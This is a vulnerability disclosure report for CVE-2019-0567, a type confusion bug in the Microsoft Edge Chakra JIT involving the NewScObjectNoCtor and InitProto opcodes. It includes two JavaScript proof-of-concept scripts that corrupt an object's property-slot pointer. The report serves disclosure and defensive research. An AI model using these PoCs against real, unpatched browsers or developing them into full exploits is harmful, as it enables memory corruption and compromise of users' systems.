Microsoft Edge Chakra JIT NewScObjectNoCtor / InitProto Type Confusion

`Microsoft Edge: Chakra: JIT: Type confusion via NewScObjectNoCtor or InitProto   
  
CVE-2019-0567  
  
  
NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.  
  
In the PoC, it overwrites the pointer to property slots with 0x1000000001234.   
  
PoC for NewScObjectNoCtor:  
  
function cons() {  
  
}  
  
function opt(o, value) {  
o.b = 1;  
  
new cons();  
  
o.a = value;  
}  
  
function main() {  
for (let i = 0; i < 2000; i++) {  
cons.prototype = {};  
  
let o = {a: 1, b: 2};  
opt(o, {});  
}  
  
let o = {a: 1, b: 2};  
  
cons.prototype = o;  
  
opt(o, 0x1234);  
  
print(o.a);  
}  
  
main();  
  
PoC for InitProto:  
  
function opt(o, proto, value) {  
o.b = 1;  
  
let tmp = {__proto__: proto};  
  
o.a = value;  
}  
  
function main() {  
for (let i = 0; i < 2000; i++) {  
let o = {a: 1, b: 2};  
opt(o, {}, {});  
}  
  
let o = {a: 1, b: 2};  
  
opt(o, o, 0x1234);  
  
print(o.a);  
}  
  
main();  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available (whichever is earlier), the bug  
report will become visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`